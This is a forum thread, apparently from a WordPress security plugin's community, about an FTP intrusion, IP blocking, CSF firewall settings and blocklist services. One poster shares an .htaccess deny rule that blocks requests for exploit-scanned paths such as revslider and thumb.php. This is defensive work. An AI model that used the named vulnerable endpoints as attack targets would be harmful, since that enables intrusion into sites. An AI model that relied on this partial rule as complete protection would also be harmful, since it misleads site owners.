Good to be clear that Wordfence does NOT defend against malicious attacks on FTP and SSH logins, and subsequent possible intrusions. Server firewall is where this happens, nothing to do with Wordfence.
Nice the Wordfence scan found the bad file, but too bad it got in there in the first place.
Are you using a server firewall? I’m using CSF but I’m not very good at setting it up, and my “Managed WordPress Hosting” just had it at all default settings, most of which do little to nothing.
Interesting to see the IP you reported is on at least one blocklist, too bad your server wasn’t able to block it…
http://www.tcpiputils.com/browse/ip-address/45.33.17.183
Jungle out there and we are in the food chain.
MTN
Wordfence does nothing to defend against server FTP and SSH compromises, unfortunately. Server firewall for that. MTN
Yeah I added a block of the IP address to the firewall… It’s a straight command line server. did not want to add a GUI just yet. I did report it today though to the IP address Nameservers. (linode.com) I checked the block list b4 though and it was not on the block list so they may have done that today… idk…. I checked again just now and it was blocked by 2 servers but that is it.
I am just gonna keep FTP turned off until I need to use it. I don’t really need it for anything else. I changed the FTP user password also just to be sure….
I also read the news from Wordfense also about the vulnerability in Revolution slider. Crazy right? I’m gonna check WordPress now if anything is storing passwords in plain text.
I’ve been running the following in my .htaccess file for a while, too bad those guys at that law firm were not doing so. I pity their IT people, I hope they’re not wearing cement boots.
# BLOCK ENDLESS SCANS
<IfModule mod_rewrite.c>
RewriteCond %{REQUEST_URI} (mssqlil|register).php [NC,OR]
RewriteCond %{REQUEST_URI} (img|thumb|thumb_editor|thumbopen).php [NC,OR]
RewriteCond %{QUERY_STRING} (img|thumb|thumb_editor|thumbopen).php [NC,OR]
RewriteCond %{REQUEST_URI} revslider [NC,OR]
RewriteCond %{QUERY_STRING} revslider [NC]
RewriteRule .* – [F,L]
</IfModule>
I compare the blocklists quite a bit to what Wordfence lets slip through their “Real Time Security Network.” Quite a few misses and the Spamhaus lists seem to be some of the best, and show the bad IP before the other guys. I’ve said it before and will say it again, it appears Wordfence should pay to concatenate at least one of those big blocklists into their “Real-Time WordPress Security Network.” This would be a great thing for the paid version of Wordfence, it would eliminate work on the part of us webmasters who have to manually deal with this stuff.
Beyond that, the question is, should I enable the use of blocklist in the server firewall, CSF? My site has a lot of traffic and does not have a robust server due to budget constraints, I’m afraid of what CSF will do to my site load time if it’s looking at huge block lists for every request. What is more, the amount of redundancy this creates (Wordfence vs CSF) seems antithetical to good server/website management.
MTN
you monitor blocklists….
I have an idea for you to try out. A chrome extension I use to monitor changes to webpages. It is called Visualping I think. I use now to notify me whenever a SamMobile.com change happens on certain page. (firmware for my phone) It catches some nonrelevant changes but I always know when they place a newer firmware up.
Oh I just noticed they added a feature where you can pick elements of a page to monitor for a change…. that will eliminate the non relevant changes it picked up before… changing my settings now
Hmmmmm they updated it but you can still get the old version. It is called Page Monitor
